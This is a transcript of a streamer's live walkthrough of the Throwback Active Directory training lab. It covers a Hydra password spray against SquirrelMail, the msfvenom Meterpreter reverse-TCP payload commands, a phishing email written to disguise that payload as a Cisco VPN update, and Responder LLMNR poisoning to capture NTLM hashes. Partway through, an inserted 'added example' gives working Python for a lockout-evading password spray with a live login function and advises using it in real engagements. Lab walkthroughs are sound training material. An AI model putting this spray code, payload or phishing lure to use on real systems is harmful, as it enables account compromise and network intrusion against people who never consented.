And so I'll put that in our readme. I'm sorry, I didn't even go into the contacts page before and that's why I failed at that and didn't even realize I didn't know that was a thing. What is the root flag on Throwback-FW? It's this guy. Thank you. Thank you. Thank you, chat. Excuse me. Oh, log flag. I didn't even, I didn't get the stupid root flag. Let me go back there. cd to /root? Holy cow. Learn to type, John. root.txt. Leet hacks. Leet hackers. Sorry, sorry. Frantic alt-tab. Epileptic, sorry. Go from white screen to gray screen repeatedly. Sorry. Just doing it again. Sorry. Okay. Now we have users and contacts which are very, very helpful and I want all of these. Please give. Please, please give. Select. Let's open a new Sublime Text tab. Let's de-dent all of this. I don't want that data. I do want all of this and are those nicknames? Those are nicknames. Yeah. Let's take them and throw them into our users, our usernames, just for the kicks, you know? And I don't need that reverse shell syntax anymore. The names of characters. Bojack Horseman is here. Oh my gosh. I don't even watch that show. Caleb does though. Caleb is like, Caleb really, really likes no reply, no reply. Emails. Let's take some of these guys out. Thanks for sticking with me, everybody. I realize, I killed the no-reply line. I realize that we've been doing this for a little bit of time so I appreciate you all sticking with me. Great. Yeah, it's like 2:30 in the morning. You guys don't need to do that. What text editor is this? I'm using Sublime Text and I killed the L in throwback.local. emails.txt. Keep track of those. Yep, yep, yep, yep. So now let me get my bearings back one more time. We have all these email addresses and all of these potential users. Is there anything else in here that I should have looked at previously that I didn't? I am using the registered version of Sublime.
That is all because one very, very generous viewer had like got so tired of me having the stupid pop-up every now and again that he's just like, here, I bought you the pro version of Sublime Text. He just sent it to me. I was like, thanks, you're the best. Sublime, I really like Sublime Text. I know like I'm not as cool and I should totally be using like Vim or Emacs. Whatever, I'm not cool. Okay, now we will do those weak password things. And let's try the cheesy list that they offered us to start with, I guess. Let me open up passwords. Good, oh, awesome. Kadawi, I started to use Sublime Text because of you and I love it. I'm very happy to hear that. Thank you, Throwback. Wait, who's that? No, Password2020. Yeah, Management2020, Management2018, Summer2020. I'm sure it will be a Winter. Let's do a Fall. Let's do an Autumn just to appease the world. Seasons, Spring2020, Management Management. And we could do all those with a different year if we really, really wanted to. I guess we should just cause that's kind of good. We'll do the same for 2018, Spring, Summer. Yeah, 18. Can I do a video of all these keyboard shortcuts with Sublime? Yes. I actually have a video in mind cause people always ask me like, hey, can you do show, can you, can you, can you? That's what they say. Can you showcase something of how you move so quickly around in the command line, in the terminal? And I'm like, yeah, I can do that. But I just need to like sit down and do it. So I promise I will sometime soon, I'm sorry. Let's try to do the Hydra then. It says I need to use Burp to do this. I don't really want to bother with Burp. So let me see if I can find those same POST requests just with a regular thing. How do they pass that in? That's all they did. You didn't, oh, they just use it to get the requests. Like variables, man. I think we can do that without. Let's go get our mail server and hop over there.
So if I just take a look here, I'll send in a fake please sub or whatever, try to log in and wait till it loads apparently so I can use the quick moment to have a drink. Okay, it does say incorrect when that's wrong. But going back, taking a look at the page here, login username, that name is gonna be login_username and secret_key, excuse me, is that literally it? Is that what they showcase? Yeah, it is, whatever. Okay, so I have Hydra installed, which is a perk of having things installed. If I go back to this directory, I can hydra -L with my usernames and my potential passwords on the machine IP, which I know is 10, 224, 232. So I can slap that guy there. And they are using that http-post-form method of Hydra. I always forget this syntax, so forgive me for having to like have to have that beside me because if it's not FTP or SSH, or I can't just say like schema and then it just runs, then I have to look at it because I'm stupid. Bitcode, John Hammond's on Twitch. Yeah, sorry, I thought I would try it because everyone's like, you should do Twitch. And I was like, okay, so here I am. I know it took me stinking forever. Welcome, thanks for coming to hang out. I'm trying to do this a little bit, trying to explore and have some fun. So login_username can equal and then the caret sign USER. I believe that's what it's asking for. Oh, no, no, yeah, sorry, a name, but I highlighted ID, so I scared myself. Password needs to be secret_key and secret_key equals PASS. Incredible, truly incredible. What else do they have in there? Okay, and then you have to specify like when it's wrong. Oh, and it should be ^PASS^, not password, and ^USER^. Yeah, okay. Security's here too, all of my friends, oh my goodness. Thanks everybody, I appreciate you coming to hang out. I hope you don't mind me fumbling around, failing in the stuff that I do, and F= needs to be when it's wrong, it'll say incorrect, and then we'll slap -V on there. Let's see if it'll try it.
Ooh, the guest one worked, so that tells me that it was right, but I didn't find anything else. So, oh, we got some optional emoticons, I love it. I need to learn how to use Twitch so that I can properly put some in there. I don't need to supply those things that I know already work. I'm actually gonna take those out to see if it will do this. Please go, please do, please again. Nice, Humphrey works, was there anything else? Will you tell me anything else? I mean, I guess I didn't really brute force anything with that one though, I just kind of found that earlier. Ooh, Wester, those emoticons there. Yeah, you guys want to have any emojis? I don't know why. I would be grateful, I'd appreciate it. Okay, what are you doing, computer? Let's try to log in with Humphrey W and his securitycenter and see if there's anything new in there. I do want to remove those though because I know that those worked. Go back to passwords and remove him. Can I please get something that I didn't have before? I know the hydra.restore file needs to do this thing. Welcome, this isn't useful. I don't want this. Is there anything else in here? He doesn't have any emails. He's just like a new person. He's like, fill out who you are. What's going on, dude? What's going on? Yeah, it needs me to like fill this out. I don't want to. Let's go back to reading. If you successfully password sprayed, you'll now have a user account or two that you have fully compromised, allowing you to view company emails and potentially gain further access into the network. So I don't have anything yet. Maybe I, how come they're using lowercase -p? They're just using a singular password. Or are they just using one at a time? Like, we put together some of these. We put together some of these weak passwords. Do I need to like throw rockyou at it? Stop, I don't need to know. I'm thinking. Anyway, let's fill out some of those things. What username found with Hydra starts with an M? I guess MurphyF we should have had a hit for.
Yeah, that's fair. MurphyF should have had a response. Is he in my users? Usernames, MurphyF. Are we just wasting time on all these other ones that I put in earlier that literally don't need to be there? Should I have had some hit? Is it an AD thing with the email loss? Like the domain? I don't think so. Let me go back to my command line anyway. Sorry, I should put in the usernames here. login_username is probably what I needed to submit there. I should do an angstrom CTF. Dude, are you on the angstrom CTF team? You guys put on an awesome game, like every single time. There are a lot of like new challenges that I'm like, ooh, I've never actually done NoSQL injection or the MongoDB thing. So thank you, thank you for providing really good challenges that are also like realistically attainable and don't make me hate myself. So kudos to you guys. angstrom CTF and ACTF is always like really good. Kudos. The reason they supplied a password. Oh, gotcha. For like the lowercase -p, I would have expected this to like find something, right? Maybe the usernames that I kind of tossed in here just are wrong. Or like the passwords that I'm trying are not what it should be. Let's run Hydra again with -I to not restore and then just throw stuff in. So like don't you put that evil on me. Did I break it? I did not break it. I could manually try to figure out passwords for my boy MurphyF over here. My man Murphy, did you try Company2020 in my pass list? Like not literally company. I put in Throwback, but I guess it is like Throwback Hacks. Should I have that? Throwback, ThrowbackHacks, ThrowbackHacksSecurity. 2020 in a world of devastation. Do it again. I know you're like probably, I know Hydra's probably still in the middle of like actively doing something. So I'm just making it worse for myself. It's fine. We can take a break. We can take a chill time. Unless like I'm literally wrong with some of these passwords here. Could someone give me a sanity check?
Looking at this password list here. MurphyF, apparently we need to, we should get a hit. Did the stream die? I just saw Twitch should be like connecting. Welcome back to the chat room. Like did the stream die? I got scared for a second. Did it die? You guys are sketching me out. RIP stream. Appreciate it. You wouldn't lie to me. Thank you. I'm staring at this. I'm staring at this form of the screenshot here. This guy, this used -p and got four different credentials that are all the same password. Am I using the Hydra syntax wrong? -p for pass and capital -P for file. Strelix is the creator. Help, please help. Send help. That's right, right? Maybe there's just, oh, oh, we got one. We got them, boys. I don't know why Hydra took forever on that one. Probably just trying to wrestle with squirrels in the SquirrelMail. It's the same for every stupid. It's the same, it's the same. Is that literally the top one there? God dang it. You guys know the song Untitled by Simple Plan? It's the really, it's kind of the old one that you guys sing or like we would sing, you know? It was like really rebellious. Oh, management got one. Ooh, we got hits now. Anyway, Simple Plan, right? Untitled, that cool emo song we would all sing when we were like in middle school, like grunge angst. And you know the chorus and the bridge where they're like, how could this happen to me? See, I do that constantly in real life. And in Caitlyn and my Caleb and my other friends, Caleb likes it. Caitlyn hates it as I'll do it like as a meme all the time. Whenever something is just wrong in my life, it's like how could this happen to me? Sweet, we got credentials. Hydra finally stinking did something. Murphy got a password and those are all four. Yeah, of course, Caleb likes it. He appreciates my memes, he appreciates my insanity. I don't know, they just keep coming. Everyone has bad passwords. Truly incredible. This is the mail server. Using Hydra, we found these credentials. Slap.
And let's bridge this guy in there. Bruh, we were the nerds. Davies? Yeah, see, it's a good thing that we looked at the Management2018. It's a good thing we looked at the contacts page and the SquirrelMail because my usernames, I was completely backwards in the way that they had organized and used their naming convention for user accounts. So thank you for putting me on the correct path. Everyone else is Summer2020. Dude, what a time to be alive, am I right? Over at the beach drinking some Coca-Colas out in the fresh air, just laying out in the sun. All the people at the beach, summer 2020. I'm not crying, you're crying. We got it. We got five accounts, right? Right, stop, stop, stop flailing around in the bitcode, that's a good joke. That's a good joke, buddy. Don't let anyone ever tell you it's not. My password is incorrect. So whenever I get my password wrong, it tells me my password is incorrect, that's a good joke. Keep on keeping on. Darkstar said no to COVID-19, what? Oh, you were originally gonna use a password of COVID-19 2020? I'm telling you, Throwback is a comedy show. We're here for a good time, guys. Okay, we should log in with all of this newfound knowledge that we have. Get out of here, SquirrelMail, Humphrey W. Let's become peanut butter in the beautiful Summer2020. Nope, that account is also useless, signing out. Thanks, LastPass. That's a good one too, Wester, I like that. Overwrite 2020 with /dev/null, shred 2020. Jeff Davies sending some test emails to his account, attaching a shell.exe. Jeff, you're an insider threat, buddy. I don't think you should be allowed back in the office. Not that anyone is. This is a zero kilobyte text file. What? It has content. All right, we're having too much fun, guys. We gotta get serious. We gotta buckle down. Now we're gonna be Gongo, Gongo H, Murphy F. I'm glad you guys like the let's become peanut butter. Password, recent notification.
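The password spray above got stuck on two things: the username convention (the stream first tried first-initial+last like jdavies, while the mail server used last+first-initial like daviesj), and the one-password-at-a-time order that keeps a spray under lockout thresholds. The block below is an added example, not code from the stream or from the Throwback room: it generates every common username convention for each contact, builds the season/word + year password list the walkthrough describes, and sprays one password across all users per round. The contact names, credentials and the login callback are constructed so it runs offline; the SquirrelMail POST helper at the bottom assumes the form field names seen in the stream (login_username, secret_key) and a failure string of "incorrect", and takes the form's POST path as a parameter because that is not confirmed on the page.

```python
"""Added example (not from the stream): password-spray candidate generation
and a one-password-per-round spray loop, target abstracted behind a callable."""
from typing import Callable, Iterable
import urllib.parse
import urllib.request

# Constructed sample contact list (first, last).  In the walkthrough these come
# from the contacts page of the compromised guest mailbox.
SAMPLE_CONTACTS = [("Frank", "Murphy"), ("Jeff", "Davies"), ("Summers", "Winters")]

SEASONS = ("Spring", "Summer", "Autumn", "Fall", "Winter")
COMMON_WORDS = ("Password", "Management", "Welcome")


def username_candidates(first: str, last: str) -> list[str]:
    """Every common corporate convention for one person, de-duplicated and in
    a stable order: first, first.last, flast, lastf, firstl, firstlast, last."""
    f, l = first.lower(), last.lower()
    forms = [f, f"{f}.{l}", f"{f[0]}{l}", f"{l}{f[0]}", f"{f}{l[0]}", f"{f}{l}", l]
    return list(dict.fromkeys(forms))


def password_candidates(years: Iterable[int], company: str = "") -> list[str]:
    """Season/word + year patterns a weak policy lets through; the company
    name (e.g. "Throwback") is added when supplied."""
    words = list(SEASONS) + list(COMMON_WORDS) + ([company] if company else [])
    out = []
    for y in years:
        for w in words:
            out.append(f"{w}{y}")
            out.append(f"{w}{y}!")
    return out


def spray(users: list[str], passwords: list[str],
          try_login: Callable[[str, str], bool]) -> dict[str, str]:
    """One password against all users per round (spray, not brute force), so
    each account sees one failed attempt per round and lockout counters reset.
    A user is skipped once a valid password is recorded."""
    found: dict[str, str] = {}
    for pw in passwords:
        for u in users:
            if u in found:
                continue
            if try_login(u, pw):
                found[u] = pw
    return found


def squirrelmail_login(base_url: str, post_path: str, user: str, pw: str,
                       fail_marker: str = "incorrect") -> bool:
    """Assumed SquirrelMail form: fields login_username / secret_key, response
    body containing `fail_marker` on failure.  post_path is the form action
    (assumption: taken from the form's action attribute, not from the page).
    Not exercised offline; wire it in as the try_login callback of spray()."""
    data = urllib.parse.urlencode({"login_username": user, "secret_key": pw}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + "/" + post_path.lstrip("/"), data=data)
    with urllib.request.urlopen(req, timeout=10) as resp:
        body = resp.read().decode(errors="replace")
    return fail_marker.lower() not in body.lower()


def demo() -> dict[str, str]:
    """Offline run against a constructed credential store."""
    users = [u for f, l in SAMPLE_CONTACTS for u in username_candidates(f, l)]
    store = {"murphyf": "Summer2020", "daviesj": "Management2018"}  # constructed
    return spray(users, password_candidates([2018, 2020], "Throwback"),
                 lambda u, p: store.get(u) == p)
```

Running `demo()` returns both constructed hits; in a real engagement swap the lambda for `squirrelmail_login` and keep the round-based ordering, since that ordering (not the list contents) is what keeps the spray below a typical five-attempts-per-window lockout policy.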
Should I have done anything with that shell.exe, actually, before I derail? I think that's like a reverse shell, I would have thought. So I would have thought. Due to the recent firing of our timekeep developer who had access to our database. Excuse me. We have decided to issue a password reset. You can do so by replacing user account name and the new password in the following. Ooh, that's good to know. Oh, Frank's first name is Murphy F. His first name is Frank. Now we've learned. We have too many readmes now. Now I'm just going crazy. This is bad. Did we actually have Frank Murphy previously? Frank Murph. Frank Murky. And that is worthwhile to know. So we saw actually over in mail, logging in with Davies J. We found a shell.exe file. Logging in with Murphy or Murphy with many Fs. We found this guy. Yeah. Do I already have Frank Murphy? Frank. Sorry to meet you. Sorry. I guess I literally have Frank Murphy in there twice. I'm a fool. Okay. So we have the thought that we can potentially rename or reset a password for some users that will be handy. I'm curious about this timekeep.throwback.local though. Cause with that domain, we don't know that yet. Can you edit the link and reset any user's password? Yes. But I don't have a location set for timekeep.throwback.local. We need a Fire Elmo also. Yeah. My favorite GIF, the Fire Elmo. I'd love that. I'd love that. Okay. We have one more user to explore before I frantically move around my keyboard again. I'm so sorry. I don't know how you guys watch these videos. Mail. We got to get Jeffers D logged out. Thanks for hanging out, everybody. I can't say it enough. He's also useless. Okay, great. Thank you for nothing, Jeff. Jeffers. Now let's go back to the readings. Let's go back to the holy book of Throwback. We've already answered all the tasks in there. So let's see what task 12 has. Whoa, whoa, whoa, whoa, whoa, whoa. A lot of scrolling. Now that we can investigate the mail server, we have a guest account on the mail server.
However, the only information we can gather from it is a contact list of employees' emails, with a list of emails we can send a phishing campaign to see if employees execute a malicious payload. Yup. Phishing, sending a deceptive sneaky lie, attaching an exe to an email, having the user execute that file, granting us a reverse shell. This can be done with msfvenom to create the payload. Before we send out phishing emails, we need to first identify targets since we have a specific goal in mind. We want to target employees at Throwback Hacks. We can find employees from the contact list of the guest account that we compromised earlier on the web servers. We can also send emails from the guest account as a trusted email within the domain. Payloads 101, we can do this with msfvenom, Metasploit. Staged payloads require you to handle the payload and send the stage. So I guess I actually don't often hear "stageless." I just hear stager, staged requires a handler like Meterpreter, like use exploit/multi/handler to catch it properly. Stageless payloads don't require any specific handler. They can be just caught with like netcat, socat, or others. Okay, I don't think I need to learn a ton of review on msfvenom. We will be using meterpreter/reverse_tcp. Cool. So far, staged payload sounds like the best payload. Yeah, sorry, I'm reading and I realized I turned off my entertainer hat. I took off my entertainer hat. I appreciate all the follows, everybody. Thanks for doing this. We're gonna make this a lot more fun, right? Hopefully we'll be able to do this a lot more. Generating payloads. All right, we're doing this with msfvenom and we'll connect to our tun0 address or what's actually inside the VPN connection, specifying a port and then an output as notashell.exe. Super cool. Okay. And then we would need to actually catch it. We could do that. Yep, they just showcase exploit/multi/handler. Yeah, you wish Streamlabs OBS, absolutely.
I 1000% agree. I wish OBS would work on Linux. And that's kind of why I was bumping around not wanting to get on Twitch because it was like, oh, I gotta have all the fancy sounds and bells and whistles go off whenever someone either subscribes or does anything, but I don't know. I hope that we'll keep this cool YouTube format, or not even YouTube format, but just homegrown and original, my webcam on the bottom and then the screen. I like to keep it simple. So, okay. Once we build this thing and we can go ahead and build this, let's go ahead and let's make a meterpreter directory. And let's use msfvenom -p windows/meterpreter/reverse_tcp. I'll set my LHOST equal to tun0 and then I will set my LPORT equal to, what do you guys think, quad eight, quad nine? Yeah, thanks. I appreciate that, Kadawi. I'm going for quad eight until anyone tells me otherwise. Four one, four one. You're quick on the trigger. Two, seven, three, seven, four. What? I don't think we need anything else in here, do we? A, A. LPORT, A, S, D, F. That's not right, John. Four one, four one. They didn't throw anything else in here, did they? It's literally all the payload that you need. Yeah, and then, okay, just make it an executable and redirect it to, big calling, there's notashell, so I'll do the same thing. It took two minutes to set up Streamlabs, but yes, if I want to set up, if I want to set up my theme from nerd or dialects, it'll be, oh yeah, yeah. Gotcha. Now we have notashell and I didn't even put that in the meterpreter directory that I made for the sole purpose of actually doing that. Meterpreter, okay. Then let's actually make a shell down there and let's make a little msfconsole shell. I'll make it dark and scary. So it looks like we're really gonna do some hacks and we'll do the exact same thing. Oh no, they forgot their LPORT, rest of their syntax. use multi/handler, bam, set LHOST to tun0.
And don't forget, they actually set the payload, windows/meterpreter, why are you guys yelling at me about the readme? What did we need in there? Yeah, so didn't your syntax, serics, use the, yeah, you literally used the greater-than symbol to redirect it. I thought that's just kind of what it needs to be in some cases. I can see -o, that's fine. meterpreter/reverse_tcp, set LPORT 4141, none of those things. And let that do its thing. Okay, then we need to craft a stealthy phishing email. Hey everyone, okay. Some phishing emails to all employees at Throwback Hacks. Send it to everyone. Is that so? Okay, yeah, I didn't type exploit. I never actually type exploit. I always type run in my Meterpreter. Whatever, let's get back to our mail and I can send it as a guest, right? Yeah, run. Oh, there's a flag button, I'm kidding. That's true, it's really like I appreciate, I appreciate you saying that. That screenshot's obviously not yours because it's Parrot and I'm kidding. Don't hate me. Let's craft our phishing email. Let's save this as a meterpreter like phishingemail.txt. phishingemail.txt. Urgent, update your Cisco AnyConnect client. Good afternoon. It has been brought to the IT, oh, okay. Let's write a real phishing email. It has been brought to the IT department's attention that there is a new critical vulnerability, and we'll make it like really official, CVE 20234517 or whatever I just did, present in the Cisco AnyConnect client that our company uses to connect to our corporate network. I feel like a hacker and I'm not even doing anything. For your safety and the benefit, security and the security of our business, please download the security update attached. This is the realest phishing email. I hope I type that as loudly as possible. For your safety and security of our business. It's physical safety. Press X to doubt. This patch and remediation must be run immediately. Love always. Johnny. Very respectfully, Throwback Hacks Security IT.
Also known as fit and you spell out the acronym. That was good. That was fun. Thanks everybody. Thanks for sticking with me on that one. Not to be confused with tea. Oh, good. Oh, no, that is not the To line. That's the subject. And who are we sending this to? Literally everyone, obviously Humphrey W. And I need to attach a file. Can I like do a comma-separated thing here? Is that gonna work? How does SquirrelMail supply other people? New line, replace with comma. I'm gonna send it to noreply at noreply. Yeah, maybe a semicolon. I can't tell. Let's find out, priority, critical, paste in our extremely pressing update. Now you guys know how to write a real legitimate phishing email. CTF, THM, throwback, notashell. Is that it? Oh, I have to hit the attach button. That would have, that would have pissed me off if I didn't click attach. Needs more typos? No. It said use correct grammar and punctuation. I like this one's very casual and very sweet. Hey everyone, we're releasing an update. Send, go, let's watch our shell. I sure hope that was right. I sure hope everything was properly created there. Who did I send this to? Other than literally everyone. It probably, it probably didn't send to anyone because of those stupid commas. Let's use the, let's, yeah, let's get the semicolons in there and see if that will behave. Bojack Horseman. Dude, he better be the one that clicks on the email. I absolutely want to phish Bojack Horseman. Don't tell him. Don't tell him I said that. notashell, attach. Are we gonna get any phish? Not yet. Send it. Let's leave that bad boy open. Stop saying bad boy, John. No one yet. I'm gonna move this up. Actually, I hope you don't mind. I'm gonna move this to the other screen just so I can like see it in my peripheral view. Oh, why did I do that? Why did I do it? Immediately we get a shell. Why did you even do it, John? Okay. Who am I? Great, thanks, Meterpreter. getuid. I am BlairJ. Oh, hello, BlairJ.
Thank you for giving me your computer. Let's... "What user was compromised via phishing?" blairj. Excuse me? Is it, is that who my... is that not who I'm supposed to... blairj? Did we hack too good? It was the phishing email, guys. I told you the phishing email was gonna get... oh, there's an E. You... thank you. Thank you, chat. Thank you, chat. I was trying to do the Blair Witch Project over here, but clearly... thank you. This dude can't type. Yeah, hey, man. You know this. We all know. All right, yeah, when you don't copy-paste, exactly. Now let's run persistence. Oh, actually, now let's do some good stuff. "Your team decides the best next move is to fire up Responder and try to poison LLMNR and get an NTLM response back." Okay, cool. Now we're getting into some stuff that I'm not extremely smart on. "So to fully understand how the LLMNR poisoning attack works, we first need to understand how LLMNR and NBT-NS work and why they're part of Windows Active Directory. Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Windows domain services that act as an alternative method for host identification. You can think of LLMNR like DNS. It allows hosts in the same network to use name resolution for other hosts." Is that so? That's kind of like... that's a really good thing. That really helps me kind of understand it. I feel bad because when I'm doing a stream or, like, in the mentality and mode of recording a video, I'll just read something and it'll go completely over my head. Like, I won't process or parse literally anything that I just said. So Link-Local Multicast Name Resolution... they are Windows domain services that are used for host identification, like DNS at a low level; hosts in the same network use name resolution for other hosts. Whoa, bitcode, thanks. I appreciate everything. Sorry, I'm just trying to catch everything that's happening in this chat. Yeah, we did Pizza Friday. We did Pizza Friday yesterday.
I actually ate all of the leftover pizza this morning for breakfast. Okay. "You can spoof the resource for a name resolution on a victim network using Responder, a tool used to respond to LLMNR and NBT-NS requests, acting as though you know the identity of a host, poisoning the service so that the victims will communicate with our machine rather than the original. If the host belongs to a resource that requires identification, the user and their NTLM hash will be sent to the attacker." Nice. "These hashes can then be collected from Responder and taken offline to be cracked and then used to access the poisoned users' machines, and can be taken to PsExec to get a shell." Okay. So we need to get Responder. I am not on Kali. So let's get Responder. Is Responder part of Impacket? It's not. It's not, is it? Responder GitHub. Yeah, it's SpiderLabs. I remember that now. I think I've messed with this tangentially before. So hop over to the old opt directory. Oh, no. No. Is it Python 2? Oh, thank you. Thank you. It's lgandx. This is the proper, correct one. I got real scared. You could see, you guys knew when I was like, what? Now let's try that again. How do we look? Responder. Responder. Incredible. Great. Okay. Responder must be run as root. Great. What do I do with it? I need an interface. tun0. Whoa. Is it just, like, doing this now? It's just doing this thing. What am I supposed to be doing? Computer. Hopefully my face isn't in the way here. Oh, if I just, like, leave it running, it'll just look for stuff. It'll just... Okay. So, "Responder's default settings are set to poison LLMNR and NBT-NS. So all we have to do is set the IP to our tun0 network. The -r switch enables NetBIOS..." NetBIOS "WREDIR suffix queries." What are those? "And the -d switch enables NetBIOS domain suffix queries, and the -w switch makes the WPAD rogue proxy server." Should I just kind of hit the "I believe" button on that? I'm sketched out. -rdw and then -v. -v I get, you know, okay, verbose.
NetBIOS redirect suffix queries. Yeah, so I fired it up. What is the... what are these? "If a Windows client cannot resolve a host name using DNS, it will use the Link-Local Multicast Name Resolution protocol to ask neighboring computers. LLMNR can be used to resolve both IPv4 and IPv6 addresses. If this fails, NetBIOS Name Service will be used. NBT-NS is a similar protocol to LLMNR that serves the same purpose. The main difference between the two is that NBT-NS works over IPv4 only." Okay. So for my own learning, is this just, like, a good thing to use whenever you're just straight up in a Windows internal environment and network? Like, if you're just sitting in there, should you just kind of be listening with Responder? Like, there's nothing wrong with that. I don't see anything wrong. Orpheus is telling me yes. "A number of attack tools have been developed which will reply to all these queries in the hope of retrieving sensitive information. Responder, developed by Trustwave SpiderLabs..." Why did you take me to Kali Linux? I wanna make sure you guys can actually read this, sorry. "To demonstrate the attack, we'll be using Kali Linux." Blah, blah, blah. "Enables answers for NetBIOS WREDIR suffix queries." Yes, yes. Quickest way to grab hashes. I haven't gotten anything yet. Am I supposed to... did I do something wrong? If it's an active network, you'll get responses like crazy. Okay, I follow. "Once you start Responder, attempt to access a non-existent share on another machine, typically the one over meterpreter." Gotcha. This would probably be explained more to me if I were to actually read. "After some time, you may get a response back from Responder. It can take anywhere from a couple of minutes to an hour to get back a response. However, on an active network, it shouldn't take more than a few minutes." Ah. Does that mean we're gonna be doing some chill time on the stream again? Are we just gonna hang out? I don't have any problem with that. You know?
We can go look at stupid memes together if you want. Yeah, bitcode's like, yeah! Yeah, stupid memes, John! Give the people what they want. Meme review with John. I can tell you guys some stories or something. If we're literally just waiting on Responder, I'm like, oh, okay, 10 minutes. I can do that. Then they do some hashcat stuff. Let me sanity check first. I'm sorry, let me make sure this is all right. Servers are right. I wanna know more about WPAD, though. John, how good are you with binary exploitation? Not good. Honestly, like, for real, I think I can do a very, very minimal classic stack-based buffer overflow. Obviously, you've seen me do cheesy, simple OverTheWire stuff. Obviously, if there's a get-shell function or a winner function, I can jump to that if it's a classic vanilla baby buffer overflow. I'm really, honestly, not that good. People give me way too much credit because I just have a silly YouTube channel. I went through a little bit of ROP Emporium and I guess I can do, like, basic ROP with ROPgadget and Ropper or some of the other things. But I can do a ret2libc attack, very, very basic. I can do a printf format string vulnerability with some pwntools and the format string thing. Oh, sorry. "I'm currently trying to do an NX plus ASLR bypass, but I think my environment is not helping me." Are you on Windows or are you on Linux? Cause I can also make it significantly worse. Linux. Yeah. Whatever you can do, I guess just try and match the architecture and operating system of the target. So many times you run into an issue because, whatever, stack alignment was different on Ubuntu 18.04 than it is on, like, whatever previous one. I've seen that bite us in the back a lot. Caleb more so than me, cause he does much more binary exploitation, but there'd be stupid, stupid crap where, like, stack alignment on 18.04 is weird. Have I tried pentest.ws? It might help to keep track of all this Throwback stuff. I have not.
Let's look at this on the internet. Yeah, I don't know of that. Sorry, Wester, I don't know. You say I'll check out how to replicate the target. I don't know if that's applicable to you. I don't know if that's worthwhile. I don't know if that's even feasible, but I guess that's something that I keep in mind. This is neat. This would be very cool. This would help. I want to make sure I didn't do this wrong. tun0 is what I should be doing, right? The fact that I have to bank on this for 10 minutes sketches me out. Cop. Been using cop lately from... oh my gosh, this is peace midi. Yo. It's like waiting for a crotch up. Yeah, that's exactly right. Bro, I am tweaking out because what you just linked, Nightwolf, peace midi, if it's the same guy, I think he's like... I think that's Phillip Smith, and he's, like, one genius that was once Army and would friggin' rock the Army Cyber Stakes competition. And he would, like, smoke all of the other students and cadets and, like, me and other midshipmen. I think that's the same guy. Let's do some... I don't want to do any OSINT on stream. Never mind, I'm not going to do that, actually. "If it takes more than 10 minutes, you should ask for a reset, because it did bug out on me when I did the lab." Okay, thanks. I appreciate that heads up. When did we start waiting? When did we go? I don't remember. I'll be honest, this is really nice. I am really enjoying myself just kind of hanging out and streaming with you guys and chilling. There is a certain perk to having solitude and not having anyone else in the house. It does sketch me out, though, because I could be doing this forever. I could be doing this for hours, but man, what do I do on stream when I have to go to the bathroom? I'm kidding, I'm kidding. I'll probably just bounce out if you're like, yo, give me a sec, guys. I gotta peace out. "Take more time while I try to get this voucher." I follow, no worries. So really, are you still with us? I appreciate you coming to jam.
I'm really, really grateful. I know it's kind of weird because I'm on Twitch and I don't normally do that, but thanks for hanging out. "Until you get an OBS or whatever set up, you could use this time to make a 'be right back' sign for my chair." That's an option. I have this piece of paper beside me. Do I have any pens beside me? Oh, kadawi, peace out. That's a good joke. That's good. Or use Sublime Text. Yeah, just, like, type it. That'd be more normal. You could also use this time to check out tmux. You guys, you guys. Can we, like, bump around in this box? Maybe that'd be fun. Oh, blairj has a root.txt. Okay, thanks, blairj. I'll take that. This is when I should get back to my README. Am I... no, I'm on... "What is the user flag on..." that? Submit. Is that right? What? Oh, sorry, root flag, root flag. Yeah. That's nine. Check Saved Games. Maybe there's a game we could still play. "What is the root flag on THROWBACK-WS01?" That's that guy. Microsoft Edge backups. Let's check out Saved Games just for the meme. Probably empty. desktop.ini, even better. That's worse than finding a directory empty. Like, wow, there's gotta be something really interesting and fascinating and juicy here in this directory. And there's, like, oh, great. Default file, classic. Can I... what, where am I right now? Users. Can I do a PowerShell, load powershell? Nope. Can I run shell? I don't wanna run shell. I don't wanna break it. I don't wanna ruin it. humphreyw. Did I just go into his directory? user.txt. Sorry. I feel like I just yelled that and I didn't need to. Like, volume control in my stream. "What is the user flag on..." oh, no, Throwback. Jackson, user.txt. We're, like, super hyped. How's a... oh, Responder got something, everybody. Oh, it got a lot. It got two. petersj. Holy cow. We've broken new ground, guys. We're in new, uncharted territory. He goes, yeah, the chat rejoices. Okay. Let's steal all of this for posterity's sake. What do I do with this?
Where do I wanna save this to be good? Throwback. Responder. Can someone actually... sorry. Am I overthinking this? Am I overthinking this in that, like, would I normally be able to see that with Responder in this position? Cause, like, I don't feel like we're in the network yet. I just have my interface that's on these same machines. Or am I not understanding, like, the kind of network architecture that's set up right now? "You're effectively in already." So effectively in, as in, like, I have my meterpreter shell, but I don't think I've set up, like, any autoroutes or anything, or effectively as in the... I follow. I follow. Now I get it. Yeah, for you people that need to go to bed, just go to bed, dude. I'm sorry we're up so late. I didn't mean for all this. petersj. Is that right? petersj. Gotcha. "What's the fourth octet of the IP address that the LLMNR request came from?" That is the 219. And we know that that is PROD, right? Go back to our original README. Yeah. We're on PROD, baby. "What is the hostname of the device?" THROWBACK-PROD. Is that in the output of a... no, no, it's not. Okay. Time to use hashcat and cause a kernel panic while I'm streaming. Incredible. We use some password cracking. We could probably do it with John the Ripper, maybe. I don't know. "Also, a lot of Active Directory attacking, especially if you want to be covert, does not involve RDPing in." Yeah. That makes complete sense to me. I think RDP would kind of be a little giveaway. I don't know. "You should use PsExec." If the kernel panics, I panic. That's good. Ooh. Colabcat? I never heard of that. What is that? I never heard of Colabcat. That's so neat. It's like a Google Drive hashcat? Okay. Today I learned. "Don't use John. Trust me." Roger. Okay. John the Ripper is out. We will roll the dice and see if we get our hash... to see if we get hashcat to keep my computer alive. Let's Google hashcat methods.
